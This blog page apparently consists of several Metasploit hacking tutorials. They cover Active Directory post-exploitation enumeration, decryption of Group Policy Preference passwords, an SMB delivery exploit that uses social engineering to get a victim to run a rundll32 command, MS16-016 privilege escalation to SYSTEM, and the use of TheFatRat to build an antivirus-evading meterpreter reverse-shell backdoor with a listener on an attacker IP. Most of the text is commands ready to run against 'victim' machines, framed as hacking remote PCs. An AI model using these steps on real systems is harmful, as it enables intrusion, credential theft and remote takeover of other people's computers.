Hacking Articles|Raj Chandel's Blog

Penetration Testing in Active Directory using Metasploit (Part 2)

at 3:11 AM Wednesday, August 10, 2016 0 comments

Enumerate all logged on users

This module will enumerate current and recently logged on Windows users.

msf > use post/windows/gather/enum_logged_on_users

msf post(enum_logged_on_users) > set session 1

msf post(enum_logged_on_users) > exploit

Gather All Group Policy Preference

This module enumerates the victim machine's domain controller and connects to it via SMB. It then looks for Group Policy Preference XML files containing local user accounts and passwords and decrypts them using Microsoft’s public AES key. Cached Group Policy files may if the group policy object is deleted rather than unlinked. Tested on WinXP SP3 Client and Win2k8 R2 DC.

msf > use post/windows/gather/credentials/gpp

msf post(gpp) > set session 1

msf post(gpp) > exploit

Find All DNS Service Records

Enumerates know SRV Records for a given domain using target host DNS query tool.

msf > use post/multi/gather/dns_srv_lookup

msf post(dns_srv_lookup) > set domain rajlab.com

msf post(dns_srv_lookup) > set session 1

msf post(dns_srv_lookup) > exploit

Find All Services in Server

This module will query the system for services and display name and configuration info for each returned service. It allows you to optionally search the credentials, path, or start type for a string and only return the results that match. These query operations are cumulative and if no query strings are specified, it just returns all services. NOTE: If the script hangs, windows firewall is most likely on and you did not migrate to a safe process (explorer.exe for example)

msf > use post/windows/gather/enum_services

msf post(enum_services) > set session 1

msf post(enum_services) > exploit

Find All Active Directory TCP sessions

This Module lists current TCP sessions.

msf > use post/windows/gather/tcpnetstat

msf post(tcpnetstat) > set session 1

msf post(tcpnetstat) > exploit

Find All Installed Application in Server

This module will enumerate all installed applications

msf > use post/windows/gather/enum_applications

msf post(enum_applications) > set session 1

msf post(enum_applications) > exploit

Find All Remote Desktop Session

This module dumps MRU and connection data for RDP sessions.

msf > use post/windows/gather/enum_termserv

msf post(enum_termserv) > set session 1

msf post(enum_termserv) > exploit

Hack Remote Windows PC using DLL Files (SMB Delivery Exploit)

at 8:13 AM Monday, August 8, 2016 0 comments

This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. Currently supports DLLs and Powershell.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/smb/smb_delivery

msf exploit (smb_delivery)>set srvhost 192.168.1.101 (IP of Local Host)

msf exploit (smb_delivery)>set srvport 445

msf exploit (smb_delivery)>exploit

Now, we have to copy the rundll32.exe code generated in victim’s run bar on PC using social engineering method.

As soon as we do that, we will get access of victim’s PC.

Now type sessions –i to display sessions opened when the victim opens the link

Now the session has opened type sysinfo to get system information, then type shell to enter into Victims command prompt.

Get Admin Access of Remote Windows PC using MS16-016 mrxdav.sys WebDav Escalation

at 7:59 AM 0 comments

This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn a process on the target system and elevate it's privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Open Kali terminal type msfconsole

Now type use exploit/windows/local/ms16_016_webdav

msf exploit (ms16_016_webdav) set session 1

msf exploit (ms16_016_webdav)>exploit

Hack Remote Windows 10 PC using FatRat

at 11:40 AM Sunday, July 31, 2016 0 comments

TheFatRat is an easy tool for generate backdoor with msfvenom ( part of metasploit framework ) and program compiles a C program with a meterpreter reverse_tcp payload In it that can then be executed on a windows host Program to create a C program after it is compiled that will bypass most AV

First, to install thefatrat we type the following command on terminal:

git clone https://github.com/Screetsec/TheFatRat.git

Once the cloning is done, go to the installed directory of fatrat and open it in terminal and type the following command to start it:

./fatrat

It will show you many options now select option 1 which is to CREATE BACKDOOR WITH MSFVENOM.

Now it will give a list of options to choose the format of the backdoor which you have to choose as per your requirements and need. To create a windows executable as a backdoor choose option 2.

Now enter the LHOST IP i.e. your system IP and LPORT i.e. the port you want the reverse connection on your i.e. attacker system. In my case the LHOST is 192.168.0.104 and LPORT is 4444.

And then exit the script by selecting y when asked

Now the generated backdoor will be present in the output directory.

Now use any trick up your sleeve to transport the backdoor to the victim and set up reverse handler on metasploit with the following commands on the msf terminal-

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.104 (the attacker system IP)

set lport 4444

exploit

Now as soon as the backdoor is executed on the victim’s machine you will get a meterpreter shell as you can see in my case.